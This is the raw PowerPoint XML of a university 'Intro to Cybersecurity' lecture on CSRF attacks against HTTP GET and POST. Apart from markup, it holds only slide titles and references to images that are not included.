            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7FEB8C91-432C-BB46-984A-774E6ACD0334}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24676357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sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7FEB8C91-432C-BB46-984A-774E6ACD0334}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40960356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sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7FEB8C91-432C-BB46-984A-774E6ACD0334}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1937919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9339881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sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7FEB8C91-432C-BB46-984A-774E6ACD0334}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24701139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sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="38862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9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7FEB8C91-432C-BB46-984A-774E6ACD0334}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41164870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496621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894945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8386447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642682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081026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16940F9-EEC7-CC4F-83C8-D1F2AF6477B3}" type="slidenum">
              <a:rPr lang="en-AU" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" alt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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="95719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a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="966788">
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="25146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6pPr>
            <a:lvl7pPr marL="29718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7pPr>
            <a:lvl8pPr marL="34290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8pPr>
            <a:lvl9pPr marL="3886200" indent="-228600" defTabSz="966788" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buSzPct val="85000"/>
              <a:buFont typeface="ZapfDingbats" charset="0"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{7FEB8C91-432C-BB46-984A-774E6ACD0334}" type="slidenum">
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300">
              <a:latin typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="321616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16940F9-EEC7-CC4F-83C8-D1F2AF6477B3}" type="slidenum">
              <a:rPr lang="en-AU" altLang="en-US" sz="1200"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" alt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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4218509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7" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C15CC8A4-164E-40A5-874A-ED934B22A29F}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Footer Placeholder 19"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Slide Number Placeholder 9"/>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AA54B74-0E06-4F36-9BB9-FC363984574C}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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D5E9A1A-3883-4A1D-8DDD-9F6B143D7D33}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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8472458" y="6217623"/>
            <a:ext cx="548700" cy="5248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879366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BC984A9-7251-40A2-AFA3-6ADB6448F142}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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863DDC6-98E4-41C3-9700-C05C8C649673}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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57347FF-057A-4275-B121-7EB1B55F16E2}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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60075882-896C-4732-8483-C97CA0AE27D0}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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084402D4-9AE1-4DA5-8FAF-59F8B82B23B8}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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8FF28CB4-C458-48A8-B36C-AD0591226469}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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63FCD68-33FA-476A-BBDE-889CD6C855F7}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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lstStyle>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C6D42272-E9DA-4BF0-9F2E-5CC509EC3045}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13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lstStyle>
          <a:p>
            <a:fld id="{A58C60F4-9D4E-4DD5-A3B8-6D0D07D894BB}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>2022/10/13</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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lstStyle>
          <a:p>
            <a:endParaRPr lang="zh-CN" alt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lstStyle>
          <a:p>
            <a:fld id="{0C913308-F349-4B6D-A68A-DD1791B4A57B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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www.exame.com/search?input=word"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hyperlink" Target="http://www.example.com/search?input="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www.example.com/" TargetMode="External"/><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www.youtube.com/watch?v=1anIUDvdCjY"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2560" y="1164728"/>
            <a:ext cx="7406640" cy="1472184"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CS 366</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Intro to Cybersecurity</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1432560" y="2066088"/>
            <a:ext cx="7406640" cy="3955200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dr.  Stella Sun</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EECS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>University of Tennessee </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fall 2022</a:t>
            </a:r>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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0"/>
              <a:t>CSRF Attacks on GET and POST</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000" dirty="0">
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46083" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394400" y="1417638"/>
            <a:ext cx="7498080" cy="4800600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="-107" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="2800" dirty="0"/>
              <a:t>Recall: HTTP GET and HTTP POST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="610537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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>HTTP GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0"/>
              <a:t>: Login Form</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000" dirty="0">
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0D20C83-BD9A-A84F-B7D1-AAE65DD7B3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1043608" y="1700808"/>
            <a:ext cx="8077200" cy="4013200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1396753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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>HTTP POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0"/>
              <a:t>: Login Form</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4000" dirty="0">
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37F00F0D-DEAD-4840-88DC-4BE22CEB5AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315977" y="1628800"/>
            <a:ext cx="7581900" cy="4279900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2290648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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97E379BD-320A-CF4E-8D66-5EE0BF361B8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1067180" y="1425125"/>
            <a:ext cx="7975600" cy="4889500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79863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305940" y="302494"/>
            <a:ext cx="7498080" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="4000" dirty="0">
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>CSRF Attack on GET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
